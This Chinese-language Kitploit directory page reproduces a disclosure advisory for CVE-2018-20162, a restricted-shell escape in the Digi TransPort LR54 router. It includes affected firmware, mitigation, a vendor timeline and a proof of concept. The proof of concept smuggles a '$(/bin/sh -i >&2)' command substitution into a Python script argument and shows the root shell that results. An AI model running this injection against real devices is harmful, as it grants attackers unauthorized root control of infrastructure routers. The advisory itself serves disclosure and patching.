Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-20162-digi-lr54-restricted-shell-escape — 概念验证漏洞利用 CVE-2018-20162:通过 SIGINT 处理缺陷实现 Digi TransPort LR54 LTE 路由器的沙盒逃逸,获取 root shell 权限。 | Kitploit
工具/GitHubGitHub/stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape
嵌入式系统安全权限提升物联网安全漏洞分析漏洞利用渗透测试硬件与物联网安全红队

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape

CVE-2018-20162-digi-lr54-restricted-shell-escape

概念验证漏洞利用 CVE-2018-20162:通过 SIGINT 处理缺陷实现 Digi TransPort LR54 LTE 路由器的沙盒逃逸,获取 root shell 权限。

查看仓库
247年前尚未审核

layout: post title: "CVE-2018-20162: Digi TransPort LR54 受限Shell逃逸" author: sgo category: security

Digi TransPort LR54是一款高速LTE路由器,广泛应用于工业、基础设施、零售和公共交通领域。

它支持在受限沙箱中运行Python脚本,并通过SSH提供一个自定义shell,该shell同样受到限制。因此,管理员无法访问底层操作系统。

我发现了一种方法,可以通过利用CLI在执行Python脚本时处理命令行参数的方式,突破沙箱并获得root shell:

当交互式Python进程收到SIGINT(通过CTRL-C)时,脚本参数在传递给交互式CLI的错误日志处理程序时未被正确转义。这允许攻击者以root身份执行任意命令。

要利用此漏洞,攻击者需要具有'super'权限的交互式CLI访问权限。设备默认启用具有此访问级别的用户。

受影响版本

Digi Transport LR54(可能还有相关产品如WR64和WR54)

固件版本 : 4.4.0.26 10/29/2018 21:14:06 固件版本 : 4.3.2.24 09/06/2018 00:58:34

以及可能更早的版本

缓解措施

用户应升级到固件版本4.5.1.4或更高版本。作为预防措施,应更改设备上存储的机密信息,如私钥和密码短语。

概念验证

  1. 使用scp或sftp将sleep.py上传到LR54,内容如下:
root@kitploit:~
import time;time.sleep(10)
  1. 在LR54 CLI中执行以下命令:
root@kitploit:~
python sleep.py --XXX $(/bin/sh -i >&2)
  1. 程序启动后立即按下CTRL-C

  2. 然后你将进入交互式root shell

root@kitploit:~
/home/digi/user # uname -a
Linux (none) 3.10.14 #1 SMP Mon Oct 29 16:18:10 CDT 2018 mips GNU/Linux
/home/digi/user # id
uid=0(root) gid=2000(users_rw) groups=2000(users_rw),2002(users_super)

时间线

  • 2018-12-13:发现漏洞
  • 2018-12-14:创建PoC,通知供应商
  • 2018-12-14:供应商确认,60天禁运期。申请CVE。
  • 2018-12-15:分配CVE-2018-20162
  • 2018-12-31:收到预发布固件。确认不受影响。
  • 2019-01-02:供应商发布修复固件4.5.1.4
  • 2019-01-25:供应商更新发布说明以引用CVE-2018-20162
  • 2019-02-13:供应商同意公开,禁运解除

参考链接

  • https://www.digi.com/products/networking/cellular-routers/digi-transport-lr54
  • http://ftp1.digi.com/support/firmware/transport/LR54/v4.5.1.4/93001306_L.pdf
  • https://www.digi.com/resources/security
  • https://blog.hackeriet.no/cve-2018-20162-digi-lr54-restricted-shell-escape
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20162

致谢

漏洞由Stig Palmquist发现。

感谢@duniel_pls和@alexanderkjall审阅此报告。

下载工具